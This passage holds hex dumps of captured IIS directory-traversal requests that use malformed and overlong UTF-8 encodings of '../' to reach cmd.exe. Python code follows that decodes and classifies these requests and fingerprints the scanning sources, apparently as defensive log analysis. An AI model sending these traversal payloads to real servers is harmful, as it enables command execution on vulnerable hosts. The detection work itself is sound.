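000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
IPv4: 207.51.58.7 -> 209.46.94.82
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 65 30 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   e0../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A      ir HTTP/1.0....
IPv4: 207.51.58.7 -> 209.46.94.82
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E FC   GET /scripts/...
010 : 80 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79   ......./winnt/sy
020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F   stem32/cmd.exe?/
030 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A   c+dir HTTP/1.0..
040 : 0D 0A                                             ..
"""
# Scan #2 in the post sends identical payloads from 207.78.143.235, so reuse the dump.
SAMPLE = SCAN1 + SCAN1.replace("207.51.58.7", "207.78.143.235")

HEX_LINE = re.compile(r"^\s*[0-9A-Fa-f]{3} : ((?:[0-9A-Fa-f]{2} ){0,15}[0-9A-Fa-f]{2})")
IP_LINE = re.compile(r"^\s*IPv4: (\S+) -> (\S+)")

def parse_records(text):
    """Yield (src_ip, payload_bytes) per record; the hex columns become raw bytes."""
    src, buf = None, bytearray()
    for line in text.splitlines():
        m = IP_LINE.match(line)
        if m:
            if src is not None:
                yield src, bytes(buf)
            src, buf = m.group(1), bytearray()
            continue
        m = HEX_LINE.match(line)
        if m and src is not None:
            buf += bytes.fromhex(m.group(1))
    if src is not None:
        yield src, bytes(buf)

def percent_decode(target):
    """Single-pass %XX decoding; malformed escapes such as '%c.' stay literal."""
    out, i = bytearray(), 0
    while i < len(target):
        if target[i:i + 1] == b"%" and re.fullmatch(rb"[0-9A-Fa-f]{2}", target[i + 1:i + 3]):
            out.append(int(target[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(target[i])
            i += 1
    return bytes(out)

# (lead mask, lead pattern, sequence length, smallest code point that length may encode)
UTF8_LEADS = [(0xE0, 0xC0, 2, 0x80), (0xF0, 0xE0, 3, 0x800), (0xF8, 0xF0, 4, 0x10000),
              (0xFC, 0xF8, 5, 0x200000), (0xFE, 0xFC, 6, 0x4000000)]

def decode_utf8_lenient(data):
    """Decode like a permissive decoder (accepts 5/6-byte and overlong forms) but
    return the length of every overlong sequence, so a filter can reject them."""
    text, overlong, i = [], [], 0
    while i < len(data):
        b = data[i]
        spec = next(((n, lo) for mask, pat, n, lo in UTF8_LEADS if b & mask == pat), None)
        tail = data[i + 1:i + spec[0]] if spec else b""
        if spec is None or len(tail) != spec[0] - 1 or any(c & 0xC0 != 0x80 for c in tail):
            text.append(chr(b))  # ASCII, stray byte or broken sequence: keep one byte
            i += 1
            continue
        n, minimum = spec
        cp = b & (0xFF >> (n + 1))  # payload bits of the lead byte
        for c in tail:
            cp = (cp << 6) | (c & 0x3F)
        if cp < minimum:
            overlong.append(n)  # e.g. FC 80 80 80 80 AF encodes U+002F '/' in 6 bytes
        text.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += n
    return "".join(text), overlong

def classify(payload):
    """Label one request by the encoding trick in its path; also return the normalised
    path and whether it is a traversal aimed at cmd.exe."""
    target = payload.split(b"\r\n", 1)[0].split(b" ")[1]
    decoded = percent_decode(target)
    text, overlong = decode_utf8_lenient(decoded)
    if overlong:
        label = "overlong-utf8-%d" % max(overlong)
    elif decoded != target:
        label = "pct-encoded"
    else:
        label = "pct-malformed" if b"%" in target else "plain"
    return label, text, ".." in text and "cmd.exe" in text.lower()

def fingerprints(text):
    """Per source, the ordered tuple of labels of its traversal requests. Identical
    tuples from unrelated addresses indicate one automated tool, not separate operators."""
    seq = {}
    for src, payload in parse_records(text):
        label, _, traversal = classify(payload)
        if traversal:
            seq.setdefault(src, []).append(label)
    return {src: tuple(labels) for src, labels in seq.items()}

if __name__ == "__main__":
    for src, fp in fingerprints(SAMPLE).items():
        print(src, fp)
```

Two of the page's variants pass straight through percent decoding (`%c.` is not a valid escape, and `%e0` yields a lead byte with no continuation bytes) and are labelled by that fact; the `F0`/`F8`/`FC` variants only become `../` after overlong UTF-8 is accepted, which is exactly the step a hardened decoder should refuse. The fingerprint for the two sample sources comes out identical, which is the "same order of variation" the post describes.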



    This archive was generated by hypermail 2b30 : Tue May 08 2001 - 07:59:32 PDT